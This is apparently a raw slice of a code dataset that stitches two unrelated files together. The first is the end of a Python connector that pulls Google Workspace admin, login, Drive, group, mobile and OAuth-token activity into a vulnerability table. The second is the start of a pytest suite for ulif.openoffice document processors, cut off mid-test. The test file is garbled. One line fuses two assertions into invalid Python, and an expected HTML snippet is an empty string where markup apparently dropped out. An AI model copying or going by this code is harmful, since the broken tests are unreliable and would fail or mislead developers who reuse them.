CONTACTS_SETTINGS\r\n # DELEGATED_ADMIN, DOCS_SETTINGS, DOMAIN_SETTINGS, EMAIL_SETTINGS, GROUP_SETTINGS, LICENSES_SETTINGS\r\n # MOBILE_SETTINGS, ORG_SETTINGS, SECURITY_SETTINGS, SITES_SETTINGS, SYSTEM_SETTINGS, USER_SETTINGS\r\n a.connector_type = activity['events'][0]['type']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n a.computer_name = activity['events'][0]['name']\r\n a.name = activity['actor']['email']\r\n # currently we/Google only support 1 event per activity\r\n for event in activity['events']:\r\n #log.info(event)\r\n event_name = event['name']\r\n\r\n try: # we don't always have 'parameters'\r\n for parameter in event['parameters']:\r\n # log.info(parameter)\r\n if 'ADD_NICKNAME' in event_name:\r\n # if 'EMAIL' in parameter['name']:\r\n # description = description + parameter['value'] + ' created '\r\n if 'NICKNAME' in parameter['name']:\r\n a.description = a.description + ' nickname:' + parameter['value']\r\n elif 'DOMAIN_NAME' in parameter['name']:\r\n a.computer_domain = parameter['value']\r\n elif 'SERVICE_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n elif 'PLAY_FOR_WORK_MDM_VENDOR_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n else:\r\n a.description = a.description + parameter['name'] + ':' + parameter['value'] + ','\r\n\r\n except:\r\n iparams = 0;\r\n\r\n if a.description == '':\r\n a.description = event_name\r\n\r\n try: # ipAddress can be missing for some event_types, like Google Mobile Management, that's ok.\r\n a.computer_ip = activity['ipAddress'] # inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n if a.computer_service == '':\r\n a.computer_service = event_name\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts # same as detected_ts\r\n\r\n if 'security_settings' in a.connector_type:\r\n a.severity = 'mid'\r\n else:\r\n a.severity = 'low'\r\n\r\n # a.links = a.name\r\n\r\n map_out_to_arceo_vunlnerability(rows,a)\r\n\r\n write_results('admin', rows)\r\n\r\n # 2 Request Login reports\r\n log.info('Getting the last {} login events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='login',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No logins found.')\r\n else:\r\n log.info('*** Logins ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n event_name = activity['events'][0]['name']\r\n a.connector_name = event_name\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type = activity['events'][0]['type']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n a.name = activity['actor']['email']\r\n\r\n if 'login_failure' in event_name:\r\n is_error = 1\r\n # Map the severity based on the type of login_failure that occurred.\r\n if len(activity['events'][0]['parameters']) > 1:\r\n event_value = activity['events'][0]['parameters'][1]['value']\r\n log.info(event_value)\r\n if 'login_failure_access_code_disallowed' in event_value: # - The user does not have permission to login to the service.'\r\n a.severity = 'mid'\r\n a.description = 'access_code_disallowed'\r\n elif 'login_failure_account_disabled' in event_value: # - The user's account is disabled.'\r\n a.severity = 'high'\r\n a.description = 'account_disabled'\r\n elif 'login_failure_invalid_password' in event_value: # - The user's password was invalid.'\r\n a.severity = 'mid'\r\n a.description = 'invalid_password'\r\n elif 'login_failure_invalid_second_factor' in event_value: # - If two-factor authentication is enabled, the user supplied an invalid second form of identification. '\r\n a.severity = 'mid'\r\n a.description = 'invalid_second_factor'\r\n elif 'login_failure_missing_second_factor' in event_value: # - If two-factor authentication is enabled, the user did not supply a second authentication factor such as a one-time password. '\r\n a.severity = 'mid'\r\n a.description = 'missing_second_factor'\r\n elif 'login_failure_unknown' in event_value: # - The reason for the login failure is not known.'\r\n a.severity = 'high'\r\n a.description = 'failure_unknown'\r\n else:\r\n a.severity = 'high' # - We end up here only when new event_values are added by Google.\r\n a.specal_note = '- Undetermined login failure - MAINTENANCE: Check Google API for new failure values.'\r\n a.description = a.specal_note + ' ' + a.description + ' Severity:'+a.severity\r\n log.error(a.description)\r\n elif 'login_challenge' in event_name:\r\n log.info(event_name)\r\n if len(activity['events'][0]['parameters']) > 1:\r\n login_challenge_status = activity['events'][0]['parameters'][1]['value']\r\n if ('Challenge Passed') in login_challenge_status:\r\n a.is_error = 0\r\n a.severity = 'low'\r\n a.description = login_challenge_status\r\n elif 'Challenge Failed' in login_challenge_status:\r\n a.is_error = 1\r\n a.severity = 'mid'\r\n a.description = login_challenge_status\r\n else:\r\n a.is_error = 1\r\n a.severity = 'high'\r\n a.description = 'Challenge Failed unknown status'\r\n # login_challenge_status\r\n # Whether the login challenge succeeded or failed, represented as \"Challenge Passed.\" and \"Challenge Failed.\" respectively.\r\n # An empty string indicates an unknown status.\r\n else:\r\n is_error = 0\r\n if len(activity['events'][0]['parameters']) > 1:\r\n a.is_suspicious = activity['events'][0]['parameters'][1]['value']\r\n # The login attempt had some unusual characteristics, for example the user logged in from an unfamiliar IP address.\r\n if a.is_suspicious:\r\n a.is_suspicious = 1.0\r\n a.suspicious = 'Suspicious'\r\n a.severity = 'mid'\r\n else:\r\n a.is_suspicious = 0.0\r\n a.suspicious = 'Normal'\r\n a.severity = 'low'\r\n else:\r\n a.is_suspicious = 0.0\r\n a.suspicious = 'Normal'\r\n a.severity = 'low'\r\n\r\n a.description = a.suspicious + ' login activity'\r\n\r\n if a.description == '':\r\n a.description = event_name\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] # inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts # same as detected_t\r\n a.links = a.name\r\n\r\n map_out_to_arceo_vunlnerability(rows,a)\r\n\r\n write_results('login',rows)\r\n\r\n\r\n # 3 Request GDrive reports\r\n log.info('Getting the last {} GDrive events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='drive',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No GDrive events found.')\r\n else:\r\n log.info('*** GDrive ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['id']['applicationName']\r\n a.connector_type = activity['events'][0]['name']\r\n a.connector_name = activity['events'][0]['name']\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type = activity['events'][0]['type']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n\r\n # currently we/Google only support 1 event per activity\r\n for event in activity['events']:\r\n # log.info(event)\r\n event_name = event['name']\r\n\r\n try: # we don't always have 'parameters'\r\n for parameter in event['parameters']:\r\n # log.info(parameter)\r\n if 'DOMAIN_NAME' in parameter['name']:\r\n computer_domain = parameter['value']\r\n elif 'SERVICE_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n else:\r\n a.description = a.description + parameter['name'] + ':' + parameter['value'] + ','\r\n\r\n except:\r\n iparams = 0;\r\n\r\n a.computer_service = activity['kind']\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] # inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts # same as detected_ts\r\n\r\n a.links = activity['actor']['email']\r\n\r\n if a.description == '':\r\n a.description = event_name\r\n\r\n map_out_to_arceo_vunlnerability(rows,a)\r\n\r\n write_results('drive', rows)\r\n\r\n # 4 Request Group reports\r\n log.info('Getting the last {} groups events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='groups',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No groups events found.')\r\n else:\r\n log.info('*** Groups ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['events'][0]['name']\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type = activity['events'][0]['type']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n\r\n # currently we/Google only support 1 event per activity\r\n for event in activity['events']:\r\n #log.info(event)\r\n event_name = event['name']\r\n\r\n try: # we don't always have 'parameters'\r\n for parameter in event['parameters']:\r\n #log.info(parameter)\r\n if 'DOMAIN_NAME' in parameter['name']:\r\n a.computer_domain = parameter['value']\r\n elif 'SERVICE_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n else:\r\n a.description = a.description + parameter['name'] + ':' + parameter['value'] + ','\r\n\r\n except:\r\n iparams = 0;\r\n\r\n if a.computer_service == '':\r\n a.computer_service = activity['kind']\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] #inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts #same as detected_ts\r\n a.name = activity['actor']['email']\r\n # vendor =\r\n\r\n if a.description == '':\r\n a.description = event_name\r\n\r\n map_out_to_arceo_vunlnerability(rows,a)\r\n\r\n write_results('groups', rows)\r\n\r\n # 5 Request Mobile reports\r\n log.info('Getting the last {} mobile events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='mobile',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No mobile events found.')\r\n else:\r\n log.info('*** Mobile ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['events'][0]['name']\r\n a.connector_version = activity['actor']['profileId'] # perhaps NOT this here\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type = activity['events'][0]['type'] # 'DOMAIN_SETTINGS'/'SECURITY_SETTINGS'...\r\n a.computer_id = activity['id']['customerId']\r\n a.computer_service = activity['kind']\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts # timestamptz\r\n a.name = activity['actor']['email']\r\n a.description = activity['events'][0]['name']\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] #inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n map_out_to_arceo_vunlnerability(rows, a)\r\n\r\n write_results('mobile', rows)\r\n\r\n #6 Request OAuth Token reports\r\n log.info('Getting the last {} token events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='token',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No OAuth token events found.')\r\n else:\r\n log.info('*** OAuth Tokens ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['id']['applicationName']\r\n a.connector_type = activity['id']['applicationName'] # 'token'...\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n a.computer_service = activity['kind']\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] #inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts #same as detected_ts\r\n a.name = activity['actor']['email']\r\n # currently we/Google only support 1 event per activity\r\n for event in activity['events']:\r\n #log.info(event)\r\n #event_name = event['name']\r\n\r\n try: # we don't always have 'parameters'\r\n for parameter in event['parameters']:\r\n #log.info(parameter)\r\n if 'app_name' in parameter['name']:\r\n app_name = parameter['value']\r\n if 'DOMAIN_NAME' in parameter['name']:\r\n a.computer_domain = parameter['value']\r\n elif 'SERVICE_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n else:\r\n a.description = a.description + parameter['name'] + ':' + parameter['value'] + ','\r\n\r\n except:\r\n iparams = 0;\r\n\r\n if app_name != '':\r\n a.description = app_name\r\n\r\n if 'authorize' in a.connector_name:\r\n a.severity = 'low'\r\n\r\n if a.description == '':\r\n a.description = activity['events'][0]['name']\r\n\r\n map_out_to_arceo_vunlnerability(rows, a)\r\n\r\n write_results('tokens', rows)\r\n\r\n\r\ndef gsuite_activityAPI():\r\n \"\"\"Shows basic usage of the G Suite Activity API.\"\"\"\r\n credentials = get_credentials(CLIENT_SECRET_FILE)\r\n http = credentials.authorize(httplib2.Http())\r\n\r\n \"\"\" create an service object with build() construction, is specific to the given API \"\"\"\r\n service = discovery.build('appsactivity', 'v1', http=http)\r\n\r\n \"\"\"Creates a G Suite Activity API service object and outputs the recent activity in your Google Drive.\"\"\"\r\n results = service.activities().list(source='drive.google.com',\r\n drive_ancestorId='root', pageSize=10).execute()\r\n # defaults values for col in arceo_vulnerability\r\n a = ARCEO_VULN()\r\n\r\n activities = results.get('activities', [])\r\n if not activities:\r\n log.info('No activity.')\r\n else:\r\n log.info('Recent GDrive activity:')\r\n rows = []\r\n\r\n for activity in activities:\r\n a.clear()\r\n\r\n event = activity['combinedEvent']\r\n user = event.get('user', None)\r\n target = event.get('target', None)\r\n if user == None or target == None:\r\n continue\r\n\r\n try:\r\n a.connector_name = 'GDrive'\r\n a.connector_type = event['primaryEventType']\r\n a.connector_type.lower()\r\n a.connector_id = target['id']\r\n a.computer_name = target['name'] # is fname\r\n a.computer_service = target['mimeType']\r\n a.name = user['name']\r\n a.computer_id = user['permissionId']\r\n time = datetime.datetime.fromtimestamp(int(event['eventTimeMillis'])/1000)\r\n a.detected_ts = time\r\n a.released_ts = a.detected_ts # same as detect ed_ts\r\n\r\n log.info('{0}: {1}, {2}, {3} ({4})'.format(time, user['name'],\r\n event['primaryEventType'], target['name'], target['mimeType']))\r\n\r\n except:\r\n iparams = 0;\r\n\r\n if a.description == '':\r\n a.description = a.name + ' ' + a.connector_type + ' ' + a.computer_name + '(' + a.computer_service + ')'\r\n\r\n map_out_to_arceo_vunlnerability(rows, a)\r\n\r\n write_results('gdrive', rows)\r\n\r\n\r\ndef parse_arguments(argv):\r\n parser = ArgumentParser(description='Collects Metrics from Google Google-Suite.',\r\n formatter_class= ArgumentDefaultsHelpFormatter, add_help=False)\r\n parser.add_argument('-?', '--help', action='help', help='Show Help Message And Exit', default=AP_SUPPRESS)\r\n parser.add_argument('-v', '--verbose', action='store_true', help='Enable Debug Logging')\r\n parser.add_argument('-s', '--scopes-url', default=SCOPES_URL, help='SCOPES URL')\r\n parser.add_argument('-t', '--token-count', default=TOKEN_COUNT, help='Event Count')\r\n parser.add_argument('-k', '--key', help='Application Key')\r\n namespace = load_namespace(parser, os.environ.get('PREFIX', 'GSUITE'))\r\n args = parser.parse_args(argv, namespace)\r\n\r\n #arguments_check(args, ['domin', 'key'])\r\n\r\n return args\r\n\r\n\r\ndef main(argv=None):\r\n logging_init(script_name, 'google-suite', facility='local4', stream=sys.stdout)\r\n args = parse_arguments(argv)\r\n logging_level(args)\r\n\r\n gsuite_adminreportsAPI(args)\r\n gsuite_activityAPI()\r\n\r\n return 0\r\n\r\n\r\n# Starting point\r\nif __name__ == '__main__':\r\n sys.exit(main())","repo_name":"tedry/googlesuite","sub_path":"googlesuite/google_suite_connector.py","file_name":"google_suite_connector.py","file_ext":"py","file_size_in_byte":30512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25508391290","text":"import codecs\nimport os\nimport pytest\nimport shutil\nimport tempfile\nimport zipfile\nfrom argparse import ArgumentParser\nfrom ulif.openoffice.options import ArgumentParserError, Options\nfrom ulif.openoffice.processor import (\n BaseProcessor, MetaProcessor, OOConvProcessor, UnzipProcessor,\n ZipProcessor, Tidy, CSSCleaner, HTMLCleaner, Error, processor_order)\nfrom ulif.openoffice.testing import (\n TestOOServerSetup, ConvertLogCatcher, envpath_wo_virtualenvs)\n\n\ndef get_unoconv_version():\n workdir = tempfile.mkdtemp()\n output_path = os.path.join(workdir, 'output')\n os.system('unoconv --version > %s' % output_path)\n output = open(output_path, 'r').readlines()\n if not output:\n # in virtualenvs we might be unable to run unoconv.\n # The workaround will retry with $PATH from special helper function.\n old_env = os.getenv(\"PATH\")\n new_env = envpath_wo_virtualenvs()\n os.environ[\"PATH\"] = new_env\n os.system('unoconv --version > %s' % output_path)\n os.environ[\"PATH\"] = old_env\n output = open(output_path, 'r').readlines()\n version = output[0].split()[-1].split('.')\n shutil.rmtree(workdir)\n return tuple(version)\nUNOCONV_VERSION = get_unoconv_version()\n\n\nclass TestProcessorHelpers(object):\n\n def test_processor_order_valid(self):\n assert processor_order('unzip, zip') == ('unzip', 'zip')\n assert processor_order('zip, unzip') == ('zip', 'unzip')\n assert processor_order('zip') == ('zip', )\n assert processor_order(',,,') == ()\n assert processor_order('') == ()\n\n def test_processor_order_invalid(self):\n # we do accept only valid processor names\n with pytest.raises(ValueError):\n processor_order('unzip, invalid, zip')\n\n\nclass TestBaseProcessor(object):\n\n def test_process_raises_not_implemented(self):\n # make sure a call to process raises something\n proc = BaseProcessor()\n with pytest.raises(NotImplementedError):\n proc.process(None, None)\n\n def test_args(self):\n # each processor should provide an arparser compatible list of\n # acceptable args that can be fed to argparsers.\n proc = BaseProcessor()\n assert proc.args == []\n\n\nclass TestMetaProcessor(object):\n\n def test_no_options(self):\n # We cope with no options set\n proc = MetaProcessor()\n assert 'meta_processor_order' in proc.options.keys()\n\n def test_ignored_options(self):\n # We ignore keys not in default dict\n proc = MetaProcessor(options={'meta-foo': '12'})\n assert 'meta-foo' not in proc.options.keys()\n\n def test_non_meta_options(self):\n # We ignore options not determined for the meta processor\n proc = MetaProcessor(options={'foo.bar': '12'})\n assert 'bar' not in proc.options.keys()\n\n def test_option_set(self):\n # We respect options set if available in the defaults dict\n proc = MetaProcessor(options={'meta-procord': 'oocp,oocp'})\n assert proc.options['meta_processor_order'] == ('oocp', 'oocp')\n\n def test_options_as_strings(self):\n proc = MetaProcessor(options={'meta.procord': 'oocp, oocp'})\n result = proc.get_options_as_string()\n assert result == (\n \"css_cleaner_minified=True\"\n \"css_cleaner_prettify_html=False\"\n \"html_cleaner_fix_heading_numbers=True\"\n \"html_cleaner_fix_image_links=True\"\n \"html_cleaner_fix_sd_fields=True\"\n \"meta_processor_order=('unzip', 'oocp', 'tidy', 'html_cleaner', \"\n \"'css_cleaner', 'zip')\"\n \"oocp_hostname=localhost\"\n \"oocp_output_format=html\"\n \"oocp_pdf_tagged=False\"\n \"oocp_pdf_version=False\"\n \"oocp_port=2002\"\n )\n\n def test_options_invalid(self):\n # Make sure that invalid options lead to exceptions\n with pytest.raises(ArgumentParserError):\n MetaProcessor(options={'meta-procord': 'oop,nonsense'})\n\n def test_avail_processors(self):\n # Make sure processors defined via entry points are found\n proc = MetaProcessor(options={'meta-procord': 'oocp, oocp'})\n assert proc.avail_procs['oocp'] is OOConvProcessor\n assert len(proc.avail_procs.items()) > 0\n\n def test_build_pipeline_single(self):\n proc = MetaProcessor(options={'meta-procord': 'oocp'})\n result = proc._build_pipeline()\n assert result == (OOConvProcessor,)\n\n def test_build_pipeline_twoitems(self):\n proc = MetaProcessor(options={'meta-procord': 'oocp, oocp'})\n result = proc._build_pipeline()\n assert result == (OOConvProcessor, OOConvProcessor)\n\n def test_build_pipeline_empty(self):\n proc = MetaProcessor(options={'meta-procord': ''})\n result = proc._build_pipeline()\n assert result == ()\n\n def test_build_pipeline_empty_elements(self):\n proc = MetaProcessor(options={'meta-procord': 'oocp,,,oocp'})\n result = proc._build_pipeline()\n assert result == (OOConvProcessor, OOConvProcessor)\n\n def test_process_default(self, workdir):\n proc = MetaProcessor(options={})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.txt\"))\n assert metadata['error'] is False and metadata['oocp_status'] == 0\n assert resultpath.endswith('sample.html.zip')\n\n def test_process_xhtml_unzipped(self, workdir):\n proc = MetaProcessor(options={'oocp-out-fmt': 'xhtml',\n 'meta-procord': 'unzip,oocp'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.txt\"))\n assert os.path.isfile(resultpath)\n assert metadata['error'] is False and metadata['oocp_status'] == 0\n assert open(resultpath, 'r').read().startswith('1' in content\n assert b'A' in content\n\n def test_process_pdf_as_non_pda(self):\n # make sure we can produce non-PDF/A output\n proc = OOConvProcessor(\n options={\n 'oocp-out-fmt': 'pdf',\n 'oocp-pdf-version': '0',\n }\n )\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n self.result_path, meta = proc.process(sample_file, {})\n assert meta['oocp_status'] == 0\n assert b'xmlns:pdf=\"http://ns.adobe.com/pdf/1.3/\"' not in open(\n self.result_path, 'rb').read()\n\n def test_process_pdf_tagged(self):\n # make sure we can produce non-PDF/A output\n proc = OOConvProcessor(\n options={\n 'oocp-out-fmt': 'pdf',\n 'oocp-pdf-tagged': '1',\n }\n )\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n self.result_path, meta = proc.process(sample_file, {})\n assert meta['oocp_status'] == 0\n assert b'xmlns:pdf=\"http://ns.adobe.com/pdf/1.3/\"' not in open(\n self.result_path, 'rb').read()\n\n @pytest.mark.skipif(\"not os.environ.get('PATH', None)\")\n def test_failing_op(self):\n proc = OOConvProcessor(Options())\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n with self.failing_unoconv_context():\n # the fake unoconv will return error unconditionally\n self.result_path, meta = proc.process(sample_file, Options())\n assert meta['oocp_status'] == 1\n assert self.result_path is None\n return\n\n def test_pdf_props_wo_pdf_out(self):\n # PDF props are set only when pdf output format is required\n proc = OOConvProcessor(\n options={\n 'oocp-out-fmt': 'html',\n }\n )\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n log_catcher = ConvertLogCatcher()\n self.result_path, meta = proc.process(sample_file, {})\n output = log_catcher.get_log_messages()\n assert '-e SelectPdfVersion' not in output\n\n def test_pdf_props_with_pdf_out(self):\n # PDF props are set only when pdf output format is required\n proc = OOConvProcessor(\n options={\n 'oocp-out-fmt': 'pdf',\n }\n )\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n log_catcher = ConvertLogCatcher()\n self.result_path, meta = proc.process(sample_file, {})\n output = log_catcher.get_log_messages()\n assert '-e SelectPdfVersion' in output\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in OOConvProcessor.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {'oocp_output_format': 'html',\n 'oocp_pdf_version': False,\n 'oocp_pdf_tagged': False,\n 'oocp_hostname': 'localhost',\n 'oocp_port': 2002,\n }\n # explicitly set value (different from default)\n result = vars(parser.parse_args(['-oocp-out-fmt', 'pdf',\n '-oocp-pdf-version', '1',\n '-oocp-pdf-tagged', '1',\n '-oocp-host', 'example.com',\n '-oocp-port', '1234', ]))\n assert result == {'oocp_output_format': 'pdf',\n 'oocp_pdf_version': True,\n 'oocp_pdf_tagged': True,\n 'oocp_hostname': 'example.com',\n 'oocp_port': 1234}\n\n\nclass TestUnzipProcessor(object):\n\n def test_simple(self, workdir, samples_dir):\n proc = UnzipProcessor()\n resultpath, metadata = proc.process(\n str(samples_dir / \"sample2.zip\"), {})\n assert resultpath.endswith('simple.txt')\n\n def test_one_file_only(self, workdir, samples_dir):\n # if a zip file contains more than one file, that's an error\n proc = UnzipProcessor()\n result_path, metadata = proc.process(\n str(samples_dir / \"sample1.zip\"), {'error': False})\n assert metadata['error'] is True\n assert result_path is None\n\n def test_unsupported_extension(self, workdir):\n # if the given file has unsupported filenames extension,\n # it is returned unchanged.\n proc = UnzipProcessor()\n input_path = str(workdir / \"src\" / \"sample.txt\")\n result_path, metadata = proc.process(input_path, {'error': False})\n assert metadata['error'] is False\n assert result_path == input_path\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in UnzipProcessor.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {}\n # explicitly set value (different from default)\n result = vars(parser.parse_args([]))\n assert result == {}\n\n\nclass TestZipProcessor(object):\n\n def test_simple(self, workdir):\n sample_path = str(workdir / \"src\" / \"sample.txt\")\n proc = ZipProcessor()\n result_path, metadata = proc.process(\n sample_path, {'error': False})\n assert zipfile.is_zipfile(result_path)\n zip_file = zipfile.ZipFile(result_path, 'r')\n assert zip_file.namelist() == ['sample.txt', ]\n\n def test_store_several_files(self, workdir):\n # Zip processor is able to store several files in a ZIP file.\n sample_path = str(workdir / \"src\" / \"sample.txt\")\n workdir.join(\"src\").join(\"othersample.txt\").write(\"Hi there\")\n proc = ZipProcessor()\n result_path, metadata = proc.process(\n sample_path, {'error': False})\n assert zipfile.is_zipfile(result_path)\n zip_file = zipfile.ZipFile(result_path, 'r')\n namelist = zip_file.namelist()\n assert sorted(namelist) == ['othersample.txt', 'sample.txt']\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in ZipProcessor.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {}\n # explicitly set value (different from default)\n result = vars(parser.parse_args([]))\n assert result == {}\n\n\nclass TestTidyProcessor(object):\n\n def test_default_xhtml(self, workdir, samples_dir):\n # make sure by default we get XHTML output from HTML.\n samples_dir.join(\"sample1.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = Tidy()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = open(resultpath, 'rb').read()\n assert b'xmlns=\"http://www.w3.org/1999/xhtml\"' in contents\n\n def test_encoding_utf8(self, workdir, samples_dir):\n # make sure we get UTF-8 output and no special stuff.\n samples_dir.join(\"sample1.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = Tidy()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', encoding='utf-8').read()\n assert u'Ü' in contents\n assert u'Ü' not in contents\n\n def test_non_html_ignored(self, workdir):\n # we do not try to tidy non html/xhtml files\n proc = Tidy()\n sample_path = workdir / \"sample.txt\"\n sample_path.write('Sample file.')\n resultpath, metadata = proc.process(\n str(sample_path), {'error': False})\n # the document path hasn't changed\n assert resultpath == str(sample_path)\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in Tidy.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {}\n # explicitly set value (different from default)\n result = vars(parser.parse_args([]))\n assert result == {}\n\n\nclass TestCSSCleanerProcessor(object):\n\n def test_cleaner(self, workdir, samples_dir):\n # make sure we get a new CSS file and a link to it in HTML\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', encoding='utf-8').read()\n snippet = u\"%s\" % (\n '')\n assert u'sample.css' in os.listdir(os.path.dirname(resultpath))\n assert snippet in contents\n assert u'With umlaut: ä' in contents\n\n def test_cleaner_css_correct_css(self, workdir, samples_dir):\n # make sure we get a new CSS file and a link to it in HTML\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n resultdir = os.path.dirname(resultpath)\n result_css = codecs.open(\n os.path.join(resultdir, 'sample.css'), 'r', 'utf-8').read()\n assert 'font-family: ;' not in result_css\n\n def test_cleaner_css_minified(self, workdir, samples_dir):\n # make sure we can get minified CSS if we wish so.\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner(options={'css_cleaner.minified': '1'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n resultdir = os.path.dirname(resultpath)\n result_css = codecs.open(\n os.path.join(resultdir, 'sample.css'), 'r', 'utf-8').read()\n assert 'p{margin-bottom:.21cm}span.c2' in result_css\n\n def test_cleaner_css_non_minified(self, workdir, samples_dir):\n # make sure we can get non-minified CSS if we wish so.\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner(options={'css-cleaner-min': '0'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n resultdir = os.path.dirname(resultpath)\n result_css = codecs.open(\n os.path.join(resultdir, 'sample.css'), 'r', 'utf-8').read()\n assert 'p {\\n margin-bottom: 0.21cm\\n }\\n' in result_css\n\n def test_cleaner_css_default_minified(self, 